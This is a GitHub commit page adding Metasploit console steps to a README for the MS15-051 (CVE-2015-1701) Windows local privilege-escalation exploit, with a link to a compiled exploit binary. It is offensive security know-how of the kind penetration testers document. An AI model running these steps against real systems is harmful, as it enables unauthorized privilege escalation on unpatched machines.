Skip to content

Commit 527a881

Browse files
committed
MS15-051
1 parent ad971c6 commit 527a881

File tree

1 file changed

+10
-0
lines changed

1 file changed

+10
-0
lines changed

MS15-051/README.md

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -6,6 +6,16 @@ Vulnerability reference:
66
* [MS15-051](https://technet.microsoft.com/en-us/library/security/ms15-051.aspx)
77
* [CVE-2015-1701](https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe)
88

9+
# load the module within the Metasploit console
10+
```
11+
msf > use exploit/windows/local/ms15_051_client_copy_image
12+
msf exploit(ms15_051_client_copy_image) > show targets
13+
...targets...
14+
msf exploit(ms15_051_client_copy_image) > set TARGET <target-id>
15+
msf exploit(ms15_051_client_copy_image) > show options
16+
...show and set options...
17+
msf exploit(ms15_051_client_copy_image) > exploit
18+
```
919

1020
### Links
1121

0 commit comments

Comments
 (0)